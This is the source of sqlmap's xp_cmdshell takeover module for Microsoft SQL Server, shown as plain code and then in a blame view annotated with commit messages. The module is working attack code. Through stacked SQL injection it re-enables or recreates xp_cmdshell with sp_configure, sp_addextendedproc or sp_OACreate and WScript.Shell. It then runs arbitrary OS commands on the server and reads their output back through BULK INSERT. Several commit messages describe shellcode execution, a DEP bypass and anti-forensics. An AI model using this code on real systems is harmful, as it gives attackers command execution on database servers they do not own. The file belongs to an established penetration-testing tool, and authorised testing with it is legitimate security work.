sqlmap/lib/takeover/xp_cmdshell.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.common import backend
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import wasLastRequestDelayed
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.unescaper import unescaper
from lib.request import inject

class xp_cmdshell:
    """
    This class defines methods to deal with Microsoft SQL Server
    xp_cmdshell extended procedure for plugins.
    """

    def __init__(self):
        self.xpCmdshellStr = "master..xp_cmdshell"

    def __xpCmdshellCreate(self):
        cmd = ""

        if backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")

            cmd += "EXEC master..sp_configure 'show advanced options', 1; "
            cmd += "RECONFIGURE WITH OVERRIDE; "
            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
            cmd += "RECONFIGURE WITH OVERRIDE; "
            inject.goStacked(cmd)

        self.__randStr = randomStr(lowercase=True)

        cmd += "DECLARE @%s nvarchar(999); " % self.__randStr
        cmd += "set @%s='" % self.__randStr
        cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
        cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
        cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
        cmd += "EXEC sp_OADestroy @ID'; "
        cmd += "EXEC master..sp_executesql @%s;" % self.__randStr

        if backend.isVersionWithin(("2005", "2008")):
            cmd += " RECONFIGURE WITH OVERRIDE;"

        inject.goStacked(cmd)

    def __xpCmdshellConfigure2005(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_configure "
        debugMsg += "stored procedure"
        logger.debug(debugMsg)

        cmd  = "EXEC master..sp_configure 'show advanced options', 1; "
        cmd += "RECONFIGURE WITH OVERRIDE; "
        cmd += "EXEC master..sp_configure 'xp_cmdshell', %d " % mode
        cmd += "RECONFIGURE WITH OVERRIDE; "
        cmd += "EXEC sp_configure 'show advanced options', 0"

        return cmd

    def __xpCmdshellConfigure2000(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_addextendedproc "
        debugMsg += "stored procedure"
        logger.debug(debugMsg)

        if mode == 1:
            cmd  = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
            cmd += "@dllname='xplog70.dll'"
        else:
            cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'"

        return cmd

    def __xpCmdshellConfigure(self, mode):
        if backend.isVersionWithin(("2005", "2008")):
            cmd = self.__xpCmdshellConfigure2005(mode)
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)

        inject.goStacked(cmd)

    def __xpCmdshellCheck(self):
        cmd = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))

        inject.goStacked(cmd)

        return wasLastRequestDelayed()

    def xpCmdshellForgeCmd(self, cmd):
        self.__randStr = randomStr(lowercase=True)
        self.__cmd = unescaper.unescape("'%s'" % cmd)
        self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
        self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

        return self.__forgedCmd

    def xpCmdshellExecCmd(self, cmd, silent=False):
        cmd = self.xpCmdshellForgeCmd(cmd)
        inject.goStacked(cmd, silent)

    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
        self.getRemoteTempPath()

        tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
        cmd = "%s > %s" % (cmd, tmpFile)

        self.xpCmdshellExecCmd(cmd)

        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))

        self.delRemoteFile(tmpFile)

        output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)
        inject.goStacked("DELETE FROM %s" % self.cmdTblName)

        if isinstance(output, (list, tuple)):
            output = output[0]

            if isinstance(output, (list, tuple)):
                output = output[0]

        return output

    def xpCmdshellInit(self):
        self.__xpCmdshellAvailable = False

        infoMsg  = "checking if xp_cmdshell extended procedure is "
        infoMsg += "available, please wait.."
        logger.info(infoMsg)

        result = self.__xpCmdshellCheck()

        if result:
            logger.info("xp_cmdshell extended procedure is available")
            self.__xpCmdshellAvailable = True

        else:
            message  = "xp_cmdshell extended procedure does not seem to "
            message += "be available. Do you want sqlmap to try to "
            message += "re-enable it? [Y/n] "
            choice   = readInput(message, default="Y")

            if not choice or choice in ("y", "Y"):
                self.__xpCmdshellConfigure(1)

                if self.__xpCmdshellCheck():
                    logger.info("xp_cmdshell re-enabled successfully")
                    self.__xpCmdshellAvailable = True

                else:
                    logger.warn("xp_cmdshell re-enabling failed")

                    logger.info("creating xp_cmdshell with sp_OACreate")
                    self.__xpCmdshellConfigure(0)
                    self.__xpCmdshellCreate()

                    if self.__xpCmdshellCheck():
                        logger.info("xp_cmdshell created successfully")
                        self.__xpCmdshellAvailable = True

                    else:
                        warnMsg  = "xp_cmdshell creation failed, probably "
                        warnMsg += "because sp_OACreate is disabled"
                        logger.warn(warnMsg)

        if not self.__xpCmdshellAvailable:
            errMsg = "unable to proceed without xp_cmdshell"
            raise sqlmapUnsupportedFeatureException, errMsg

        debugMsg  = "creating a support table to write commands standard "
        debugMsg += "output to"
        logger.debug(debugMsg)

        self.createSupportTbl(self.cmdTblName, self.tblField, "varchar(8000)")
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`#!/usr/bin/env python`

			`"""`
			$Id$

large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`"""`

Major code refactoring - centralized all kb.dbms* info for both retrieval and set. 2011-01-20 02:06:15 +03:00			`from lib.core.common import backend`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import randomStr`
			`from lib.core.common import readInput`
code refactoring 2010-12-08 17:26:40 +03:00			`from lib.core.common import wasLastRequestDelayed`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
			`from lib.core.exception import sqlmapUnsupportedFeatureException`
Closes #111 (DECLARE/CHAR encode xp_cmdshell parameter in MSSQL). 2010-11-02 18:31:51 +03:00			`from lib.core.unescaper import unescaper`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.request import inject`

			`class xp_cmdshell:`
			`"""`
			`This class defines methods to deal with Microsoft SQL Server`
			`xp_cmdshell extended procedure for plugins.`
			`"""`

			`def __init__(self):`
			`self.xpCmdshellStr = "master..xp_cmdshell"`

			`def __xpCmdshellCreate(self):`
			`cmd = ""`

Major code refactoring - centralized all kb.dbms* info for both retrieval and set. 2011-01-20 02:06:15 +03:00			`if backend.isVersionWithin(("2005", "2008")):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.debug("activating sp_OACreate")`

			`cmd += "EXEC master..sp_configure 'show advanced options', 1; "`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
			`cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. 2010-10-28 04:19:40 +04:00			`inject.goStacked(cmd)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`self.__randStr = randomStr(lowercase=True)`

Minor fix and cosmetics 2011-01-24 14:12:33 +03:00			`cmd += "DECLARE @%s nvarchar(999); " % self.__randStr`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`cmd += "set @%s='" % self.__randStr`
			`cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "`
			`cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "`
			`cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "`
			`cmd += "EXEC sp_OADestroy @ID'; "`
			`cmd += "EXEC master..sp_executesql @%s;" % self.__randStr`

Major code refactoring - centralized all kb.dbms* info for both retrieval and set. 2011-01-20 02:06:15 +03:00			`if backend.isVersionWithin(("2005", "2008")):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`cmd += " RECONFIGURE WITH OVERRIDE;"`

Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. 2010-10-28 04:19:40 +04:00			`inject.goStacked(cmd)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`def __xpCmdshellConfigure2005(self, mode):`
			`debugMsg = "configuring xp_cmdshell using sp_configure "`
			`debugMsg += "stored procedure"`
			`logger.debug(debugMsg)`

			`cmd = "EXEC master..sp_configure 'show advanced options', 1; "`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
			`cmd += "EXEC master..sp_configure 'xp_cmdshell', %d " % mode`
			`cmd += "RECONFIGURE WITH OVERRIDE; "`
			`cmd += "EXEC sp_configure 'show advanced options', 0"`

			`return cmd`

			`def __xpCmdshellConfigure2000(self, mode):`
			`debugMsg = "configuring xp_cmdshell using sp_addextendedproc "`
			`debugMsg += "stored procedure"`
			`logger.debug(debugMsg)`

			`if mode == 1:`
			`cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', "`
			`cmd += "@dllname='xplog70.dll'"`
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`else:`
Minor fix 2010-05-10 18:18:41 +04:00			`cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'"`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`return cmd`

			`def __xpCmdshellConfigure(self, mode):`
Major code refactoring - centralized all kb.dbms* info for both retrieval and set. 2011-01-20 02:06:15 +03:00			`if backend.isVersionWithin(("2005", "2008")):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`cmd = self.__xpCmdshellConfigure2005(mode)`
			`else:`
			`cmd = self.__xpCmdshellConfigure2000(mode)`

Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. 2010-10-28 04:19:40 +04:00			`inject.goStacked(cmd)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`def __xpCmdshellCheck(self):`
code refactoring 2010-12-08 17:26:40 +03:00			`cmd = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
code refactoring 2010-12-08 17:26:40 +03:00			`inject.goStacked(cmd)`

			`return wasLastRequestDelayed()`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`def xpCmdshellForgeCmd(self, cmd):`
Closes #111 (DECLARE/CHAR encode xp_cmdshell parameter in MSSQL). 2010-11-02 18:31:51 +03:00			`self.__randStr = randomStr(lowercase=True)`
			`self.__cmd = unescaper.unescape("'%s'" % cmd)`
			`self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr`
			`self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)`
			`self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)`
Major bug fix in takeover functionalities on Microsoft SQL Server 2010-01-29 03:09:05 +03:00
Closes #111 (DECLARE/CHAR encode xp_cmdshell parameter in MSSQL). 2010-11-02 18:31:51 +03:00			`return self.__forgedCmd`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. 2010-10-28 04:19:40 +04:00			`def xpCmdshellExecCmd(self, cmd, silent=False):`
			`cmd = self.xpCmdshellForgeCmd(cmd)`
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`inject.goStacked(cmd, silent)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. 2009-09-26 03:03:45 +04:00			`def xpCmdshellEvalCmd(self, cmd, first=None, last=None):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`self.getRemoteTempPath()`

sqlmap does not save nor leave back in temporary folder any file named 'sqlmapRANDOM', only random names now, less suspicious 2010-02-26 16:13:50 +03:00			`tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))`
Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. 2010-10-28 04:19:40 +04:00			`cmd = "%s > %s" % (cmd, tmpFile)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`self.xpCmdshellExecCmd(cmd)`

Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. 2009-09-26 03:03:45 +04:00			`inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
sqlmap 0.8-rc2: minor enhancement based on msfencode 3.3.3-dev -t exe-small so that also PostgreSQL supports again the out-of-band via Metasploit payload stager optionally to shellcode execution in-memory via sys_bineval() UDF. Speed up OOB connect back. Cleanup target file system after --os-pwn too. Minor bug fix to correctly forge file system paths with os.path.join() all around. Minor code refactoring and user's manual update. 2009-12-18 01:04:01 +03:00			`self.delRemoteFile(tmpFile)`
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring. 2009-09-26 03:03:45 +04:00
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)`
			`inject.goStacked("DELETE FROM %s" % self.cmdTblName)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`if isinstance(output, (list, tuple)):`
			`output = output[0]`

			`if isinstance(output, (list, tuple)):`
			`output = output[0]`

			`return output`

Avoid useless checks for --os-bof (no need to check for DBA or for xp_cmdshell). Minor code restyling. 2010-01-04 18:02:56 +03:00			`def xpCmdshellInit(self):`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`self.__xpCmdshellAvailable = False`

			`infoMsg = "checking if xp_cmdshell extended procedure is "`
polite cosmetics 2010-12-10 18:28:56 +03:00			`infoMsg += "available, please wait.."`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info(infoMsg)`

			`result = self.__xpCmdshellCheck()`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if result:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info("xp_cmdshell extended procedure is available")`
			`self.__xpCmdshellAvailable = True`

			`else:`
			`message = "xp_cmdshell extended procedure does not seem to "`
			`message += "be available. Do you want sqlmap to try to "`
			`message += "re-enable it? [Y/n] "`
			`choice = readInput(message, default="Y")`

			`if not choice or choice in ("y", "Y"):`
			`self.__xpCmdshellConfigure(1)`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if self.__xpCmdshellCheck():`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info("xp_cmdshell re-enabled successfully")`
			`self.__xpCmdshellAvailable = True`

			`else:`
			`logger.warn("xp_cmdshell re-enabling failed")`

			`logger.info("creating xp_cmdshell with sp_OACreate")`
			`self.__xpCmdshellConfigure(0)`
			`self.__xpCmdshellCreate()`

sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`if self.__xpCmdshellCheck():`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info("xp_cmdshell created successfully")`
			`self.__xpCmdshellAvailable = True`

			`else:`
			`warnMsg = "xp_cmdshell creation failed, probably "`
			`warnMsg += "because sp_OACreate is disabled"`
			`logger.warn(warnMsg)`

Avoid useless checks for --os-bof (no need to check for DBA or for xp_cmdshell). Minor code restyling. 2010-01-04 18:02:56 +03:00			`if not self.__xpCmdshellAvailable:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`errMsg = "unable to proceed without xp_cmdshell"`
			`raise sqlmapUnsupportedFeatureException, errMsg`

			`debugMsg = "creating a support table to write commands standard "`
			`debugMsg += "output to"`
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup. 2010-01-02 05:02:12 +03:00			`logger.debug(debugMsg)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
Minor bug fix to --os-cmd/--os-shell for Microsoft SQL Server 2009-07-25 15:45:23 +04:00			`self.createSupportTbl(self.cmdTblName, self.tblField, "varchar(8000)")`